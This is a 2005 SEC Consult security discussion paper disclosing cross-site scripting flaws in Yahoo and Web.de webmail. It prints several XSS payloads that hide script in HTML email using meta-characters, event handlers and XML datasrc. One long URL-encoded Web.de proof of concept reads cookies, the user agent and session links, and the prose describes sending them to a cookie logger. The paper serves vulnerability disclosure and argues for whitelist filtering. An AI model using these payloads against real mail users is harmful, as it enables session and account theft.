SEC-CONSULT Security Discussion Paper 20051202-1
================================================================================
title: A Word on Webmail Security and Browser related XSS Bugs
program: Multiple Webmail Solutions
found: ---
by: SEC Consult Vulnerability Lab / www.sec-consult.com
affected vendors: Yahoo, Web.de
original adv.: http://www.sec-consult.com/234.html
================================================================================
-----------
1. PREFACE:
-----------
As you all know, it is a tedious task to secure webmail services against
Cross Site Scripting attacks if they provide HTML email functionality.
Within the last few years a new type of XSS Attacks have emerged. The
combination of classic style XSS and incorrect HTML parsing of several
Webbrowsers (mostly MSIE) can lead to a dangerous situation for webmail
systems as well as other webapplications. Especially the insertion of
non printable characters like 0x00,0xff but also many others can be used
to trigger such combined vulnerabilities.
Many vendors implement blacklist filters or other security measures,
while the root of the problem remains untouched. SEC Consult has been in
touch with various webmail vendors for quite some time, trying to make
this point clear. However, the situation has not changed as the security
officers in charge do not show much interest in the matter. The tenor of
replies (if any) to our advisories is that this is not a security issue
or is impossible to exploit. Eventually, specific Cross Site Scripting
vectors will be quietly fixed, though, but it is a matter of minutes to
find a new one.
In this security information, we will address fixed and unfixed Cross
Site Scripting flaws of large scale webmail providers to add some proof
for our ongoing allegations.
-----------------------------------------
3. LATEST XSS VECTORS FOR YAHOO s WEBMAIL
-----------------------------------------
OUR LATEST YAHOO ADVISORY:
==========================================================
SEC-CONSULT Security Advisory 20051125-y8 Yahoo / MSIE XSS
==========================================================
Product: Yahoo Webmail in combination with MSIE 6.0(maybe other browsers)
Remarks: no other Versions tested but very likely vulnerable
Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan
Vendor: Yahoo
Vendor-Status: first time vendor contacted (2005.09)
Vendor-Patchs: patched in production environment
Object: MSIE (unknown version - 5.+)
Exploitable:
Local: ---
Remote: YES
Type: XSS - Cross Site Scripting - Cookie/Account Theft
============
Introduction
============
Yahoo-Webmail Vulnerability #8/2005
Followup for http://seclists.org/lists/bugtraq/2005/Oct/0263.html
=====================
Vulnerability Details
=====================
1) XSS / Cookie-Theft / Relogin Trojan
======================================
Yahoos blacklists fail to detect script-tags in combination with
SPECIAL/META-Characters.
This leaves Webmail users using MSIE vulnerable to typical XSS /
Relogin-trojan attacks.
Vulnerable TAG/ATTRIBUTTE
=========================
XML/DATASRC
Malicious HTML-Mail:
===========================================================================================================
XML-TAG / datasrc ATTRIBUTE:
---cut here---
<h1>Hola Seniores,</h1><br>\n<xml id=i><x><c><![CDATA[<img
src="javas]]><![CDATA[cript:alert('Thank You ');
">]]></c></x></xml><span da[Some META-Char]tasrc=#i datafld=c
dataformatas=html></span>
---cut here---
===========================================================================================================
===============
General remarks
===============
We would like to apologize in advance for potential nonconformities
and/or known issues.
======================================
Recommended hotfixes for webmail-users
======================================
Do not use MS Internet-Explorer.
=================
Recommended fixes
=================
Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.
==============
Vendor-Patches
==============
vulnerability has been fixed in production environment.
.. and in addition some examples taken from our Yahoo webmail XSS
Advisories from 2005.
================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you
now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie"
value="http://[somewhere]/yahoo.swf";></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg"; one[META-Char]rror="alert('i have
you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you
now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================
... many more to come :)
--------------------------------
3. EXPLOITING XSS FLAWS / WEB.DE
--------------------------------
Web.de is one of Germany's biggest webmail/freemail provider. Running
javascript HTML Mails can be done by trivial standard tricks, however,
web.de claims to be unexploitable due the security guards in place.
Firsty, session validation based on three variables, being the User-ID
Cookie, the useragent, and the random session ID which is passed along
in every URL. As a second security measure, HTML Mails are loaded into
their own frame from a different domain. This request is validated with
an encrypted one time token. Obviously, this makes it more difficult to
steal the main session ID, because the victim's browser prevents the
attacker's javascript code from cross domain scripting. Naturally, this
"protection" can be circumvented. In our proof of concept exploit, we
first extract the original domain from document.referer.We then use this
information to open the main website in an iframe and leverage one of
many other Cross Site Scripting flaws on web.de. This gives us access to
frame[0], where we can extract the session ID from any link. We then
extract the User-ID cookie and useragent by standard means and pass them
to our cookie logger, along with the session ID.
THE FIRST WEB.DE ADVISORY:
REMARK:
When we wrote the first advisory for web.de we thought it would be
necessary to use a combination - attack (Browser/XSS). After a while we
found out that you can achieve the same goals without using special/meta
characters.
===========================================================
SEC-CONSULT Security Advisory 20051125-w1 Web.de / MSIE XSS
===========================================================
Product: Web.de Freemail in combination with MSIE 6.0 (probably other
browsers)
Remarks: no other versions tested but very likely vulnerable
Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan
Vendor: Web.de (Part of United Internet)
Vendor-Status: first time vendor contacted (2005.08)
Vendor-Patchs: unpatched (Vendor does not consider XSS as a vulnerability)
Object: MSIE (unknown version - 5.+ / other Browsers maybe affected too)
Exploitable:
Local: ---
Remote: YES
Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft
============
Introduction
============
Web.de is one of the largest freemail provider for the german speaking area.
Web.de - Webmail/Freemail Vulnerability #1/2005
=====================
Vulnerability Details
=====================
1) XSS / Cookie-Theft / Relogin Trojan
======================================
Web.de s blacklists fail to detect script-tags in combination with
SPECIAL/META-Characters.This leaves Freemail users using MSIE (and most
likely many other browsers) vulnerable to typical XSS / Relogin-trojan
attacks. The people from web.de try to hide their authentication
tokens in another subdomain which is of course not a real measure of
security but much more "security by obfuscation". Even if this
precaution would prevent users from stealing session-ids and cookies it
would never be sufficient against relogin-trojan attacks!
Vulnerable TAG/ATTRIBUTTE
=========================
MANY(most likely every one which can be used to inject java/vbscripts)
How to create a malicious HTML-Mail using perl to exploit this
vulnerability (this part of the advisory has
been modified for this discussion paper):
==============================================================================================================================
<h1>Milk is for babies. When you grow up you have to drink beer.</h1><br>
<img src="x.png" onerror="var
_x=document.referrer.substring(8,29);document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F')
+_x+unescape('%2F%68%6F%6D%65%2F%77%65%62%64%65%5F%66%72%65%65%6D%61%69%6C%2E%68%74%6D%3F%6D%63%3D%25%32%32%25%33%45%25%33%43
%69%6D%67%25%32%30%73%72%63%25%33%44%6E%6F%77%68%65%72%65%25%32%30%6F%6E%65%72%72%6F%72%25%33%44%25%32%32%76%61%72%25%32%30%75
%61%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%6E%61%76%69%67%61%74%6F%72%25%32%45%75%73%65%72%41%67%65%6E%74%25%32
%39%25%33%42%76%61%72%25%32%30%63%6B%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%64%6F%63%75%6D%65%6E%74%25%32%45%63
%6F%6F%6B%69%65%25%32%39%25%33%42%25%32%30%76%61%72%25%32%30%6C%6E%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%74%6F
%70%25%32%45%66%72%61%6D%65%73%25%35%42%30%25%35%44%25%32%45%64%6F%63%75%6D%65%6E%74%25%32%45%6C%69%6E%6B%73%25%35%42%31%25%35
%44%25%32%39%25%33%42%61%6C%65%72%74%25%32%38%25%32%37%25%32%41%25%32%41%25%32%41%25%32%30%6C%61%64%69%65%73%25%32%30%61%6E%64
%25%32%30%67%65%6E%74%6C%65%6D%61%6E%25%33%41%25%32%30%25%32%41%25%32%41%25%32%41%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%75
%61%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%63%6B%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32
%42%6C%6E%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%39%25%33%42%25%32%32%25%33%45%25%33%43%6E%6F%73%63%72%69%70
%74%25%33%45%22%20%68%65%69%67%68%74%3D%31%20%77%69%64%74%68%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));"/>
// if you are a security/jscript professional its an easy task to get a
readable plaintext version of this :-)
// please remove linefeeds for proper functionality
==============================================================================================================================
===============
General remarks
===============
We would like to apologize in advance for potential nonconformities
and/or known issues.
======================================
Recommended hotfixes for webmail-users
======================================
Do not use web.de s freemail.
=================
Recommended fixes
=================
Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.
==============
Vendor-Patches
==============
Vulnerability has not been fixed in production environment.
Remark regarding our disclosure policies:
Normally SEC-Consult's disclosure policy forbids making vulnerabilities
public before they are fixed.
In a couple of telephone calls, with a LETTER and many e-mails the
people from web.de could not be convinced that Cross Site Scripting is a
security vulnerability. Since it is not very likely that a fix will be
made available soon we would like to inform the users of web.de about
this serious issue.
----------------------------------------
4. RECOMMENDED FIXES FOR WEBMAIL VENDORS
----------------------------------------
You must employ whitelist filters. Meaning: Do not rely on filtering
"script", "javascript" and specific exploits. Deny HTML tags by default,
then allow the basic required tags and validate each of them. SEC
Consult and other security professionals will not hesitate to give you
free advice on how to implement this correctly.
------------------
5. GENERAL REMARKS
------------------
We would like to apologize in advance for potential nonconformities
and/or known issues.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com
EOF SEC Consult Vulnerability Lab / @2005
research at sec-consult dot com
![http://dontexist.info/x.jpg"](http://dontexist.info/x.jpg"){kind=link}
